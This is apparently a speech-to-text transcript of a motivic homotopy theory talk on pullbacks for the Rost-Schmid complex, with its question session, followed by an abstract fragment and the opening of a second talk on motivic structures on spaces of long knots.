So I feel like this would more give you extra structure in the sort of S1 direction, but we're dealing with sheaves of a billion groups, so it has already all the extra structure in the S1 direction. Okay, so now we have this topological guess here, and I explained to you that maybe for some esoteric reason, you want to convince yourself that this is true, and then Morale has proved that this is true. But I mean, categorically minded people that we are, of course, we expect all of this stuff to be factorial. Right, so if I change x to some other variety, then obviously this is more, I mean, then there's going to be some pullback map, and clearly this also only has to depend on the contraction. So that seems obvious enough. So this is sort of this obvious question, but what about pullback? Right, so let me amplify this, what do I mean? Right, so we let, sometimes I don't know, let f from y to x be some morphism of smooth schemes, and let z contained in x closed, closed, sorry, co-dimension, greater than or equal to d, and then I have to assume, of course, that the pullback also has co-dimension greater than or equal to d, this is not automatic. And I let my f be one strictly homotopy invariant sheaf. Okay, so then there's this pullback map. Okay, I mean, that's because it's comodity with support, it's factorial by definition, whatever abstract definition you use when like injective resolution, so whatever. And so this group here only depends on the contraction, right, on f minus. Yeah, obviously this map only depends on f minus d with extra structure. Okay, so this only depends on f minus d plus transfers, let me just write so this is just some shortcut for all this extra structure which we discovered. And, right, so when I, when I, when I came to this, and this little exercise about the topological expectations and I noticed that Fabian has already proved that I was very happy, because, well, this would allow me to solve some interesting problem, and I assumed that surely just souping it up a little bit whatever we've done so far, and it should give you should give you this. And, so I will tell you in a little bit what I was hoping to do, but it turned out that I spent many hours days and nights trying to do this obvious thing. And I could not do it, or it took me very, very, very long time so this turns out somehow, either I'm a bit dumb or this is much harder, or equally hard as proving this is not at all follow obviously. So let me note this theorem. And this is what this is the theorem which the title of the talk is about right, so the pullbacks for the rush mid complex exactly is supposed to say, Well, how do you want to write what you would want to think is that there's some some map, which you do on this rush mid complex, and that should tell you how to do the pullback, and then you should easily deduce this result here. And it's true. At least this is let's say to then there's somehow a map which you can write down on this partial rush mid complex which you think should be the pullback and it would have the desired property. But it's very difficult somehow to prove that this map which you do write down, indeed is the map which is supposed to write down. And that's what the theorem is about. Okay, so I hope the statement makes sense. So let me interject for a little bit. So who the hell cares. I feel like that that would be a very reasonable question. 
I mean, to an extent, of course, we're just testing the waters of a motivic finite loop space theory; I think by itself this is a reasonable thing, but maybe it would also be fair to say it's a little esoteric. So let me give you one corollary which came from this. This is joint work with Maria Yakerson. And it says the following. So k is a perfect field; I should have said this from the beginning, so k is always a perfect field in all the results. OK, so let me fix some motivic space, a pointed motivic space X. Now what can I do? What I can do is try to stabilize this guy: spaces are hard, spectra are simpler, and how do you make it simpler? Basically by smashing with P^1, so by smashing with both the directions of connectivity, with S^1 smash G_m. So what I do is I take my X, and then I map it to Omega_{P^1} Sigma_{P^1} X. In some sense, classically what happens is the Freudenthal suspension theorem, which tells you that this map here, depending maybe on the connectivity of X, will induce isomorphisms on some homotopy groups. And this is this sort of stabilization phenomenon, and in fact what you do is you do this a bunch of times, let's say n plus one times here, and basically you want to take the colimit of the whole system, and then this colimit here is going to be the stabilization, and this space at the end is supposed to be the simpler version. And so the point of the Freudenthal suspension theorem is that if you just do this, starting with X and then doing a bit more and a bit more, these homotopy groups will stabilize. So there is this nicer stable answer at the end, infinitely far away, but actually you already reach it at a finite stage. That is, I would say, a very important result in classical topology, which unfortunately we do not have an equivalent of motivically. And so this theorem here can be used to prove something in that direction: Freudenthal says that you should get an isomorphism on the first couple of homotopy groups, depending on how high up you go, and we can do this now on pi_0, which of course is much, much weaker than what you would hope for, but it says that this is an isomorphism if n is greater than or equal to three. Right, so you can imagine you have your space X, and then you have Omega Sigma X, and Omega squared Sigma squared X, and so on and so forth, and then you reach the stabilization here, Sigma infinity X. And pi_0 of Sigma infinity X is going to be the same thing as pi_0 of Omega^3_{P^1} Sigma^3_{P^1} X. This stabilization, this Freudenthal-type phenomenon, which is of course supposed to happen for all homotopy sheaves, at least on pi_0 it does happen, and it happens at the third step. So I would like to believe that this is quite a nice result, and hopefully it justifies expending energy trying to prove this. So now, the rest of my time I would like to spend trying to indicate to you how to prove this theorem. I will not indicate how you get the corollary; I won't do this, because that would be another half hour. And, at least for my taste, this is basically some pretty hardcore algebraic geometry. But OK, let's try.
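Written out, the corollary with Yakerson as I understand it from the talk (the exact indexing is my reading of the spoken statement):

\[
\pi_0\big(\Omega^{3}_{\mathbf{P}^1}\Sigma^{3}_{\mathbf{P}^1}X\big)\;\xrightarrow{\;\cong\;}\;\pi_0\big(\Omega^{n}_{\mathbf{P}^1}\Sigma^{n}_{\mathbf{P}^1}X\big)\;\xrightarrow{\;\cong\;}\;\pi_0\big(\Omega^{\infty}_{\mathbf{P}^1}\Sigma^{\infty}_{\mathbf{P}^1}X\big)\qquad(n\geq 3),
\]

for X a pointed motivic space over the perfect field k; that is, the P^1-stabilization of pi_0 is already reached after three suspension-loop steps.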
So how do we prove the theorem? Well, it's going to be a struggle; we have to fight. Now, first of all, there are some easy cases. So there's an easy case, which is when f is smooth, or more generally flat, although flatness somehow does not help. (I don't believe this is known to fail; maybe it's known not to work with the most optimal bounds which you could guess, but I don't think anyone knows these things to fail. But we also can't prove it. So there was a question whether this stabilization result, which I proved for pi_0, will also hold, or is known to be false, for higher homotopy sheaves, and I believe it's not known to be false; I'm sure everyone believes it to be true, but we don't know how.) The easy case is if f is smooth, and the reason is that in this case there's a pullback map on the entire Rost-Schmid complex, without support. It's compatible with the pullback on F because, basically, you build it to do that. And then the universal property, sort of what the resolution means, immediately tells you that everything works; so smooth maps are super easy. There's another easy case, which I don't want to treat, which is if your F is what's called a homotopy module, or an infinite loop sheaf. And the reason is that in this case: I told you there's this fantasy formula which you want to write down, but it uses transfers, and then you have a problem because you don't have transfers on C^0, so you cannot make this map. But if you have an infinite loop sheaf, then you do have transfers on C^0, and again you can use this construction of Rost to write down the pullback map, and you can check that it does everything that you want. And basically the problem in general is that you cannot write down this map on the Rost-Schmid complex, because in degree zero you don't know what to do. You can write it down in the higher degrees, but then you have to somehow argue that it's the correct one. I only mention the fact about homotopy modules in passing, because the whole point of this result is to prove it for strictly homotopy invariant sheaves in general, and they're definitely not all homotopy modules. So here's a key observation, and it is very simple. Let's say I have my Z contained in X, of codimension greater than or equal to d. Then what I do is I look at the generic points of Z, and I only look at those, let's say, of codimension d in X. I mean, every point of Z has codimension at least d in X, so I'm looking at those which have the smallest possible codimension; not every generic point needs to do this, because there could be stupid things like Z being a union of two pieces where one is much smaller, so it has higher codimension. OK, so typically X is some smooth guy, Z is some closed integral guy, and then there's just one generic point, whatever. And then what you do is you look at this map from H^d with support in Z of X with coefficients in F, and I map it to the corresponding H^d where I henselize my X in this generic point. This need not be a closed point of X, so this is maybe a slightly odd algebraic thing to do, but that's the beauty of algebraic geometry, we can do such things. And OK, here the support should maybe be Z intersected with the henselization, but it's going to be annoying to write. The point is twofold; one is that this map is an injection.
Right, and the reason is just that you look at the Rost-Schmid complex here. So if I take cohomology with support in Z, it means I chop off the first couple of terms, namely the terms in degrees below d, so it's going to inject into this thing here: I see exactly those points of codimension d which lie in Z, and I take the d-fold contraction. And since henselization does not change the residue field, this map is an injection. And the other point is that this map from the henselization to X is basically pro-etale. So, up to some pretending, it's etale, and that's basically one of the smooth maps which we understand. So the pullback is understood. OK, so what this means is that, in general, whenever I have to pull back along some arbitrary map, I can at least shrink the target to some etale neighborhood of certain points, and this hopefully will make things simpler. So the way I want to summarize this is that the problem is local, in some specific sense. OK. So now we come to the real thing. I want to sketch the proof of the following lemma, and I will just treat a special case. So I assume that the field has characteristic zero, and I let Y and X be essentially smooth; this is just some trickery which allows me to work with something like the henselization, which is not quite a smooth scheme but is reasonably close to one. I give myself some map f from Y to X which is in fact a closed immersion of codimension one. And then of course I have to give myself Z contained in X, closed, of codimension greater than or equal to d, and I have to assume that Z intersected with Y, inside Y, still has codimension greater than or equal to d. I give myself F, a strictly homotopy invariant sheaf. And then what I want to prove is that this pullback map f^*, from H^d with support in Z of X with coefficients in F to H^d with support in Z intersect Y of Y with coefficients in F (and I will call this intersection here W), only depends on F_{-d} plus transfers. So this is a special case of the main theorem: a special case (a) because I'm assuming that the characteristic is zero, and (b) because I'm assuming that this map f is a regular immersion, a closed immersion, of codimension one. This second point is not a huge deal, because we've already dealt with smooth maps, so I can reduce: every map can be written as a composite of a smooth map and a regular immersion. So you have to deal with regular immersions, and since the problem is also local, I can factor locally as a composite of codimension-one immersions. So you reduce to this codimension-one case; easy. The characteristic zero assumption is more serious, so I'm going to say some things that don't quite work in positive characteristic; you have to argue more carefully, but something along the same lines also works, except you have to deal with annoying things like regular not being the same as smooth, and so on. Yeah, I have only a finite amount of time and energy to explain things to you, and I think characteristic zero is already a complicated enough argument. OK, so we have 15 minutes; I hope that I will be able to convey some ideas to you. So what do we do?
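For reference, the special case being proved is the following (reconstructed from the spoken statement):

\[
f^*\colon H^d_Z(X,F)\;\longrightarrow\;H^d_{Z\cap Y}(Y,F)\quad\text{depends only on }F_{-d}\text{ plus transfers,}
\]

where the base field has characteristic zero, f: Y -> X is a codimension-one closed immersion of essentially smooth schemes, Z is closed in X with codim_X Z >= d and codim_Y (Z cap Y) >= d, and F is strictly homotopy invariant.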
So the first step: we reduce to the case where X has dimension d plus one; then of course Y has dimension d and Z has dimension one, and of course W has dimension zero, and I want to assume that it's just one point, and a rational point. OK, so how do you do this? This is some sort of standard trickery. What you do is you replace X by the henselization. So what I do is, of course, I pick my point W, a point of codimension d in Y, because the problem was local, because of this business here; the problem is local at points of codimension d in Y lying in the intersection. So I pick this point and I just have to look locally around it, and I replace X by the henselization at this point, and of course I also replace Y by the henselization at this point and Z by the henselization at this point. OK, and then it's a sort of standard fact that this inclusion here admits a retraction. This is not immediately obvious, but there are algebraic ways of seeing this and geometric ways of seeing this; please believe me that this is the case. And now, of course, because we're in characteristic zero, this guy is regular over this guy, which is some field, so this map here is going to be smooth; well, essentially smooth. OK. So now, what have I done? Well, I have localized at this point, so you will see that these dimension statements happen automatically. And I replace the base, of course, by the residue field of W. And so by this trickery I can now assume that this W is indeed a rational point. I mean, the statement is so general and it's going to be hard enough, so we make our lives a bit more reasonable. OK, so now I still want some further reductions. So I can assume that actually X and Y are smooth. Right, in the assumptions, and also because I did the henselization business here, I only said essentially smooth, so it's some cofiltered limit of smooth schemes. And all of these things are going to happen at some finite stage in this cofiltered limit, and there's some continuity statement saying that the value of F on the limit is the colimit of the values, so you can assume things happen at some finite stage; so you can assume that X and Y are actually, I mean, not proper, but real bona fide smooth schemes. And then, Z in principle could intersect Y in many points, but I can just throw out all the others, so I can assume that Z intersect Y is just W; I guess that's already included here. And I can assume that Z is smooth away from W, because Z is a curve, and in characteristic zero it's only going to have finitely many singularities, and I just throw out all of them except possibly W; away from W, then, Z will be smooth. No problem. So now this Y into X is a regular immersion of codimension one, so it's locally principal; again, by working locally around this point W, I can assume that Y is the vanishing locus of a single function f. And finally, I can assume that X is affine. Again, all of this because it's a local problem. OK, so I will admit that maybe it's not quite clear where we're going, but let me try. I'm now going to make two claims which are basically the heart of the proof, and which I'm not going to prove because, well, time, attention span, various reasons. So the first claim is the following.
The claim is that there exists a function u-bar from Z to A^1 having a bunch of good properties. First of all, I want it to be nonzero at W. Secondly, I want the product u-bar times f-bar (f restricted to Z is also a function from Z to A^1) to be finite as a map from Z to A^1. And also, I want u-bar not to have double roots. OK, so how do you do this? It's basically a Riemann-Roch argument, plus using the fact that, right, you can use Riemann-Roch because Z is mostly a smooth curve. This allows you to get basically all of this; and how do you make sure it doesn't have double roots? That uses the fact that fields of characteristic zero are infinite: I can always add some constant to it, and then there are no double roots. OK, so let's believe this for now. And then what I do is I put phi_1 equal to this product. Well, sorry: I use the fact that this X is affine, so I pick some u from X to A^1 extending u-bar, and then I put phi_1 equal to u times f, a function from X to A^1. OK. And now here's the second claim. The second claim is that there exist more functions, phi_2, phi_3, and so on up to phi_{d+1}, from X to A^1, such that the following holds (I write phi for all of them together, phi_1 up to phi_{d+1}): phi of W equals zero, and phi is etale at all points of phi_1 inverse of zero intersected with Z. And moreover, there exists an open neighborhood U contained in A^d such that if I base change Z to there and map it via phi to U times A^1, this is going to be a closed immersion. And maybe, if you know about these things, this looks like Gabber's lemma, or like part of Gabber's lemma, and indeed that's essentially where it comes from; you can prove this, because the field is infinite, by a general projection argument. OK, so now I'm sure you all remember all the fifteen functions and schemes and everything that we had so far. Just in case you don't, and also so that I feel like I'm telling you something, let me try to give you an artistic impression of what's going on. I hope this is going to work and help. Let's try. So what had we done? Right, so we had our smooth scheme X. We only have two dimensions, so everything is only going to be two-dimensional, and X is just going to be some blob here. OK, so that's X. Now inside there we had the Y; this was some smooth scheme of codimension one, so it's going to be some sort of curvy thing here. So this is my Y. And then we had a Z, some closed subscheme, also of whatever codimension, but the only choice I have here is that it's also going to be some one-dimensional guy. But it could have singularities, and it turns out that the problem mainly arises if the singularities of Z meet Y. So this is the kind of thing which is going to happen: this is going to be Z. And then we had the intersection with Y, which we call W, and the big deal is that our W is this point here, which is a singularity of Z. So this is what makes everything difficult. OK, so this is what we had started with. So what else did we do? Well, the first thing which we did was, right, we cooked up this u. So let me draw this in here: this u will give me some other guy, and this is going to be the vanishing locus of u.
And this white line is, by the way, the vanishing locus of f. OK, and then we had lots of maps, the phi_1 up to phi_{d+1}, so there's some map which I call phi, equal to (phi_1, ..., phi_{d+1}). And this now goes to A^n, of course A^{d+1}. So let me try to draw this. Again, I only have two dimensions. So this is an A^1 here, with coordinate x_1, and there's an A^1 here with coordinate x_{d+1}, and there are some more coordinates in the middle of course, but I cannot draw them. And so what happened here? Well, phi_1 was the product of u and f, so the preimage of this axis here is going to be the union of the blue bits, that is, the union of Y and some extra thing. And what else? We had Z. Now Z is going to do something; I'm going to try to draw this, maybe like this, something like this. OK, so what's going on here? Well, the W is still here, still this singular point; we couldn't do anything about that. But also, what can happen is that this u, so this thing here, could have some new intersections with Z, for example here. So this is some new intersection. This I cannot avoid. But I had asked that u-bar should not have double roots, so this is some new transverse intersection. At the beginning, the problem is basically when Z has a singularity on the intersection; so basically what I'm telling you is that there's a new intersection, but it's good, we can understand it. Right, and then also, what we had said is that on some open neighborhood, this guy here, Z, should be a closed immersion. So now my Z, which was this sort of curve here, turned into that sort of curve here, but now it has a new double point. So that's a problem here; that's one of my bad points. It's a problem, but that's fine. Right, so what this is saying here is that it should be a closed immersion locally in this coordinate. So I just throw out this point, and then my U is going to be A^d, which in this picture is A^1, I suppose, minus these finitely many bad guys. No problem. And then away from that it's supposed to be a closed immersion, so maybe that's what I'm drawing. So, morally, what has happened here is that we managed to straighten things out: the X and the Y were some arbitrary smooth schemes, and now we've somehow managed to straighten them out into a full A^1. That's somehow what Gabber's lemma always does: it gives you enough room to get the full A^1, at the expense of having this new guy here and these new guys here, which we now have to deal with. But if you take nothing away from my talk, please at least remember that the point of Gabber's lemma is to straighten things out into an actual A^1, whatever that means. So now I have four minutes to try and finish the proof, so what do I do? One thing which I do is I let U_0 be the intersection of U with the locus where the first coordinate is zero. So in our case that's just this point here, but in general it could have more dimensions. And then it turns out that there's some open subset here, which will be well chosen, and I will not tell you how the choice works, and then the following is going to happen. So what do I do? OK, so maybe, yeah, maybe I will abbreviate this.
And what I will say is: more steps. I will tell you that it suffices to understand the pullback from H^d with support in Z_U of A^1 over U, with coefficients in F, to H^d with support in Z_{U_0} of A^1 over U_0, with coefficients in F. So the whole point of this game was that I replace the situation on the left by the situation on the right. So how is this any better? One thing which we can observe is that this Z is finite over U, so this is some proper morphism. So what I can do, since Z over U is finite, is embed A^1 into P^1, and then Z will remain closed in P^1. And so instead, let's say, I can do this: it's also enough to understand this. And now, what can I do? OK, so I have this H^d with support in Z_U of P^1 over U with coefficients in F, and now I'm supposed to pull it back to H^d with support in Z_{U_0} of P^1 over U_0 with coefficients in F. However, this Z_{U_0} is basically just finitely many points, so this group here I can work out using the Rost-Schmid complex: that's just F_{-d} of W, so that's this point, and then maybe there are some stupid other points which we have to deal with, plus a whole bunch of points, a sum of F_{-d} of the y_i, these annoying new points. And now is where the transfer comes in. So there is a transfer map here; let me write it. It goes to H^{d-1} with support in p(Z_U), by which I mean just the image under the projection in this direction, of U, with coefficients in F_{-1}. Right, so if you ignore the supports here, this is just saying what H^d of P^1 over something with coefficients in F is: you just use the fact that P^1 is S^1 smash G_m, so you should remove one from the d and you should remove one from the F, and that's how I got this. And you can check that you can play with the supports here, and this, it turns out, is basically the nature of the transfer; this is what the transfer is. And I can do the same thing below: I can put here H^{d-1} with support in p(Z_{U_0}) of U_0, with coefficients in F_{-1}, and there's another transfer here, and this diagram commutes; this is very elementary. And I can also work out this thing here: so this is F_{-d} of W again, because it's a rational point, plus maybe some other things. So I'm out of time, but also I'm at the end. Right, because, what does the transfer do? I told you that this is an abstractly defined map which has something to do with the transfer, and you can see here, in this simple case: this is some sum of F_{-d} evaluated at some points, and they map down to some other points, and so what you need is to find some kind of transfer; and this construction here gives you a transfer, and you can see what it is. But now the point is, we had designed this so that this W here is a rational point, so there's no field extension. So this is actually nice. OK, so now I'm done, right? I had something here, and I'm supposed to figure out what its image here is. So I need to figure out what it is here and here. And suppose that I know this map here: I had something here, I know it here, I know it here, so I know everything here. And also, I had told you that these new points are somehow easy, so I also know everything here.
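To keep track of the shape of the argument, the commuting square being described is roughly the following; this is my reconstruction of the board, with p denoting the projection to U, respectively U_0:

\[
\begin{array}{ccc}
H^{d}_{Z_U}\big(\mathbf{P}^1_U,F\big) & \xrightarrow{\ \mathrm{tr}\ } & H^{d-1}_{p(Z_U)}\big(U,F_{-1}\big)\\
\downarrow & & \downarrow\\
H^{d}_{Z_{U_0}}\big(\mathbf{P}^1_{U_0},F\big) & \xrightarrow{\ \mathrm{tr}\ } & H^{d-1}_{p(Z_{U_0})}\big(U_0,F_{-1}\big)
\end{array}
\qquad
H^{d}_{Z_{U_0}}\big(\mathbf{P}^1_{U_0},F\big)\;\approx\;F_{-d}(W)\oplus\bigoplus_i F_{-d}(y_i),
\]

where the horizontal transfers come from P^1 being S^1 smash G_m, which drops one cohomological degree and one contraction.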
So basically, in this big group here, I know everything except for this value here, and I can transfer it down all the way to here. OK, but now, well, if I just pretend it is zero here for a bit, transfer all of these things down, subtract that off from what it's supposed to be, and then invert this map here, I will figure out what the last component is. And so then, what have we done? Well, it suffices to understand this map. And now we're done, by induction: I have now managed to reduce the d, so you can just go again, and eventually you get to d equals zero, and d equals zero is trivial. So I'm sorry for running over time, but I hope I have given you some idea of how algebraic geometry proves this interesting result in motivic homotopy theory. Okay, thanks a lot for a wonderful talk, Tom. Let's see, are there any questions? Let's start with a question: in the corollary, the result with Maria Yakerson, there was, I think, a number three showing up. Yes. Is it possible to somehow explain why it's the number three? Yes. So this number three has something to do with the following thing; although I'm not sure if it's optimal. What is this, right? It has to do with the following: you take F_{-1}, it has some transfers, and F_{-2} has transfers; they all have transfers, and the feeling is that each successive guy has transfers, better transfers, better and better transfers. Right, just like how, classically, iterated loop spaces have a group structure, an E_n-structure. And so the feeling is that eventually the F_{-infinity} should have framed transfers. Now, it actually turns out that already F_{-3} does, and F_{-2} does if the characteristic is equal to zero, and the conjecture is that F_{-1} has framed transfers. OK, so that was a lot of waffling, but the point is that the contractions give you more and more structure, and we believe that you get all the structure already after three steps, or after two steps, or maybe after one step, and that is where this number comes from. Right, so this number three is because we can prove that after three steps you have the full structure. Okay, thanks. Then there's a question from Sean Tillson. He asks: is there extra structure that you have now, from this corollary, like more than the abelian group structure? Yes. I mean, one thing which you do learn is that if you take pi_0 of Omega_{P^1}^3 Sigma_{P^1}^3 F, this is actually a homotopy module, so this has all the structure which you could possibly ask for. In fact, in the proof we learn this. Right, but if you take a threefold loop space and then you have good structure, this is not a super exciting thing; the point of the proof is that already, even without taking loops, you have a lot of extra structure. So the answer is yes, we definitely do get more structure on various things, and this is basically the heart of the proof. And there's a question: is there an analogue of May's recognition principle for motivic loop spaces? Well, in the world, does there exist one? I hope so. Can we prove it? I believe not, right now.
So there is some sort of S^1-loop space theory, which says: can you deal with it in the S^1 direction? And I would argue that this is probably reasonably well understood; I'm not sure if it's written down in this language, but this sort of thing we can probably do. But the delooping in the G_m direction is very, very hard, so we do not have, yeah, we do not have a recognition principle even for something like P^1-loop spaces, or G_m-loop spaces. The problem is that, because G_m is not connected itself, these things are sort of... it seems likely to me that you might have something for P^1, or P^1 smashed with itself d times; for these you might have it, but we do not have any of these. We do have a recognition principle for motivic infinite loop spaces, which says something like: they are grouplike spaces with framed transfers. But we definitely do not have this at finite stages. If we did, then my result would be much easier, or, I mean, as easy as proving this recognition principle. Yeah, please work on that and prove it; that would be great. Did you need characteristic zero to prove your theorem? Because characteristic zero doesn't appear in the hypotheses of the theorem. Yes; no, I mean, I did not. I used characteristic zero to make the already probably long and hard-to-follow argument a little less annoying. In positive characteristic you do something which is roughly the same story, but this reduction at the beginning, this point here, becomes a few pages of arguing that you can still do something like this in positive characteristic. But yeah, so I did this only to simplify the exposition, and I only proved a special case. Another question: can you make a comment on the zero, the pi_0, in your corollary with Yakerson? Well, what can I comment on, on what the zero means, or... sorry, I didn't quite get it. Well, could you change it to pi_1? No. I, well, I would like to believe that, but what we do is very much confined to pi_0. So I think that, yeah, I would conjecture, or whatever, you would guess that you can do something like pi_i here, and then maybe n greater than or equal to, I don't know, something like 3i, or 3 plus i, I don't know how it goes; that would be what you would think, or what I would think. But I would expect that this probably requires a different kind of attack, so I don't know; I definitely cannot do it, I wish I could, but I can't. Can you explain where the zero comes up, in going from the transfer result to the corollary? Yes, I can, I think, do that. So how does this work? The way this works is that I look at the category of S^1-spectra, and then I have the category of motivic spectra. Right, so I can go to here, and I can go to here, and basically I want to figure out what this composition is. So I can imagine this is happening in spaces: I can first smash with G_m and go somehow to this SH^{S^1}(k)(1), and then I go to (2), and I keep going, and I can always factor it like this. Right, I'm just saying that if you do an infinite iteration of G_m-loops and G_m-suspensions, you can do one, and one, and one, and then eventually you always have to do infinitely many. And what the proof eventually shows is that if you look at the hearts here...
Right, so these categories, in some sense, the first one, then the next one, and so on and so forth, in a way which I find difficult to make precise, approximate this category; well, I guess I can take some limit of these categories, but whatever. Right. And so what we prove is that SH^{S^1}(k)(n), heart, has this natural functor to SH(k)^{eff}(n), heart, and this is an equivalence for n greater than or equal to three. And then eventually you get the corollary from that by some formal manipulations. And the way this works is that basically we know very explicitly what this guy is, and so we have to describe these things very explicitly, and we just find our way through, and eventually we see what the objects in here are; they are like these sheaves, and they have some extra structure, and then eventually we argue that this is all the structure. And so if you want to do it for, say, pi_1, then you don't look at the heart, but you have to look at something like, right, things concentrated in degrees zero and one; I don't know, some sort of motivic 1-types. And you could try to do the same analysis, but it's going to get much more complicated, and then you have to do it with 2-types and so on. Yeah, so that's my attempt at answering your question. Okay, great. Other questions? Yeah, yeah, just to understand more precisely: so you don't build pullback maps on the Rost-Schmid complex, but instead you prove this independence result? Right. So, yes, well, I haven't really thought about that; or, another detail. Yes, so maybe I should say: right, you have this thing, C^0(X, F) goes to C^1(X, F) goes to C^2(X, F) and so on and so forth, and now you can do the same thing with Y. Okay, and then the dream would be that you have some maps here which make everything work. But the problem is that there is no transfer here, and then you cannot write it down, so that's the problem. Okay, but instead, you can do the support-in-Z thing, and then this guy just goes away, I mean it just doesn't exist, and more don't exist. And then the point is that there is this formula which was written down for how to do it: there exists a map here, and there is this one here, and everything commutes, right. And so the ideal thing would be to prove that this is the correct thing. And I think what my result shows, but I have to think about that, is that, sort of, if the lowest terms, if these are all zero, then this map here does the correct thing. So there's this fantasy map which you write down, and it will actually give you the thing which comes sort of implicitly out of what I'm doing with the transfer, whatever. And my feeling is that you might be able to soup this up, to learn by some induction argument that it does actually the correct thing, right, that these maps here which you can write down all induce the correct map on cohomology. But I have not actually tried to do that, and I think it would maybe be annoying, but it's not out of the question; I'm not sure. But yeah, the title says pullbacks for the Rost-Schmid complex, and I definitely don't do this in general. Okay, thanks. Thanks. Okay, anybody else? I think that concludes the questions, so thanks again, Tom, for a wonderful talk. Next up is Dylan.
John also asked about the negative stable homotopy sheaves, and the answer is no. Okay, thank you.
|
Let k be a perfect field and M a strictly homotopy invariant sheaf of abelian groups on Sm_k. The cousin complex can be used to compute the cohomology of a smooth variety X over k with coefficients in M. However, if X --> Y is a morphism of smooth varieties, there is not in general an induced map on cousin complexes, so computing pullbacks of cohomology classes is difficult. In this talk I will explain how such pullbacks may nonetheless be computed, at least up to choosing a good enough cycle representing the cohomology class (which is always possible in principle, but may be difficult in practice). Time permitting, I will mention applications to the
|
10.5446/50932 (DOI)
|
Thank you very much for inviting me to this beautiful conference and for making sure it happens despite the conditions. Yeah, so, well, I want to tell you about some surprising, at least in my opinion, interaction between low-dimensional topology and the theory of motives. As a disclaimer, I have to say that I am by no means an expert in motives, so it could be that I forget to name some people or misattribute some results. If this happens, don't hesitate to intervene and correct me. All right, so, well, let me start by defining the first word in my title: knot. So here's the definition. I fix a linear embedding j of R into R^3, and I'm going to study the space of long knots, so it's Emb_c(R, R^3), the space of embeddings from R to R^3 that coincide with my fixed linear embedding j outside of a compact subset of R. And you equip this with the compact-open topology; well, the topology is not very relevant. Whatever the topology, the pi_0 of this space is really the set of knots that we know. And more generally we can do this; well, there is no reason to restrict to R^3 as target. You can do the same construction with target R^d for any d that is at least three. What's special about R^3 is that this space has many interesting connected components; the field of knot theory is about studying the set of components of this space. When d is at least four it's a connected space, but it still has higher homotopy groups, so it can be interesting as a space. Okay, so here's a picture of a typical element in the space of long knots in R^3. And okay, so let me state the main theorem in a slightly imprecise form, and I'll give a more precise version as soon as I make more definitions. So the theorem is that for d at least four, the space of embeddings of R into R^d has a motivic structure. And in the case of knots, the space of embeddings of R into R^3, it's not quite that space that will have a motivic structure; it's what I denote T_infinity of that space. And I will define this in the talk, so at the moment you can just view this as an approximation to the space of knots. And in both cases the motives are over Q. And so what do I mean by a motivic structure? When I say a space X has a motivic structure, I mean there is a motivic homotopy type whose Betti realization is X. And I'm going to define what I mean by a motivic homotopy type. Maybe naively you could imagine that a motivic homotopy type would be an object in the unstable motivic homotopy category; it's not quite what I mean. So let me define this now. So I'm going to fix once and for all a number field K and an embedding of K into the complex numbers. We have a question, about the Betti realization. Oh, he just answered it. Sorry, he just answered it. Oh, sorry, sorry, excuse me. Okay, good. Right. So once I fix the embedding, I have a Betti realization. So the most basic version of this is, yeah, when I have an algebraic variety, let's say a smooth algebraic variety over K, I can base change it to the complex numbers along that embedding, and then I have a complex algebraic variety, and that has an underlying homotopy type. And then from this construction, I can also get a Betti realization for any category of motives over K. And I'm going to denote this Betti realization functor, whatever the source is, by B. And it's always going to be relative.
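For definiteness, the space in question is (a minimal transcription of the definition just given, with j the fixed linear embedding):

\[
\mathrm{Emb}_c(\mathbf{R},\mathbf{R}^d)\;=\;\big\{\,f\colon\mathbf{R}\hookrightarrow\mathbf{R}^d\ \text{a smooth embedding with}\ f=j\ \text{outside a compact subset of }\mathbf{R}\,\big\},\qquad d\geq 3,
\]

and the main theorem says that Emb_c(R, R^d) for d at least four, respectively T_infinity Emb_c(R, R^3) in the case of knots, carries a motivic structure over Q.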
So there will always be an embedding sigma that is fixed. Okay, so I'm going to denote by DA(K, Lambda) the infinity category of motives over K with coefficients in the commutative ring Lambda. So I think it's standard notation; DA is the version without transfers. And I use the etale topology, and if I use the etale topology, then it doesn't matter whether I have transfers or not. Okay, and now I can define what I mean by simply connected. So I'm going to define first what a simply connected motivic homotopy type is, and then there is a slightly more involved version if you want to remove the words simply connected. So a simply connected motivic homotopy type over K is the data of a commutative algebra A in my category of motives with coefficients in Q, and I require that this commutative algebra, or rather its Betti realization, which is going to be a commutative algebra now in the derived category of Q, so what people call a CDGA, a commutative differential graded algebra, is simply connected: it doesn't have cohomology in degrees zero and one, well, in degree zero you just have the unit and nothing in degree one. And of finite type, so finite-dimensional cohomology in each degree. Yes, so that's, you should think of this as the rational part of the homotopy type. Then, for each prime p, I give myself a simply connected p-complete space X_p, again of finite type, so finite-dimensional cohomology. Oops, I think we lost connection. Karim, do you hear us? Hello, yes, I hear you. Okay, it's not an issue with the IHS. No, no, no. Do you hear us? But Jeffrey uses a Linux computer with the wireless network. Okay, okay. Yeah, okay. Let's continue. It's all right. Okay, sorry. Can you still see my screen? I see your picture. I see you, but I don't see your file, your Beamer file. Okay, can you see it now, the screen? Yes. Okay, so I was giving the definition of a simply connected motivic homotopy type. So there is a rational part, which is a commutative algebra in the category of motives with Q coefficients. For each prime p, I have a p-complete space X_p which is simply connected, of finite type, and has an action of the absolute Galois group of my field. And finally, I have compatibility data between these two things. So for each prime p, I have an equivalence of commutative algebras between the commutative algebra of cochains on X_p with coefficients in Q_p and the Betti realization of the algebra A tensor Q_p. So maybe a few words of explanation here. So the left-hand side is maybe not quite a commutative algebra but merely an E_infinity-algebra, but that's not very problematic here: you can either strictify to a strictly commutative algebra or, since we're working in infinity-categorical language, there's no difference between these two notions. The left-hand side has an action of gamma_K just because X_p by assumption has an action of gamma_K. The right-hand side has an action of gamma_K, and that's because of the isomorphism between the Betti realization and the etale realization: instead of working with the Betti realization, you could work with the etale realization, and you get something which is equivalent and has an action of the Galois group. Sorry, we received a question for you: what is a commutative algebra in DA(K, Q)? A commutative monoid object? Yes. But yeah, maybe I should emphasize that this notation DA(K, Q) is maybe usually used for the triangulated category of motives.
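So, schematically, the data being described is a triple; this is my paraphrase of the definition, with B denoting the Betti realization and gamma_K the absolute Galois group:

\[
\Big(\,A\in\mathrm{CAlg}\big(\mathrm{DA}(K,\mathbf{Q})\big),\qquad (X_p)_{p\ \mathrm{prime}},\qquad \alpha_p\colon C^*(X_p;\mathbf{Q}_p)\;\simeq\;B(A)\otimes_{\mathbf{Q}}\mathbf{Q}_p\,\Big),
\]

where each X_p is a simply connected p-complete space of finite type with a gamma_K-action, B(A) is required to be a simply connected CDGA of finite type, and each alpha_p is a gamma_K-equivariant equivalence of commutative algebras.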
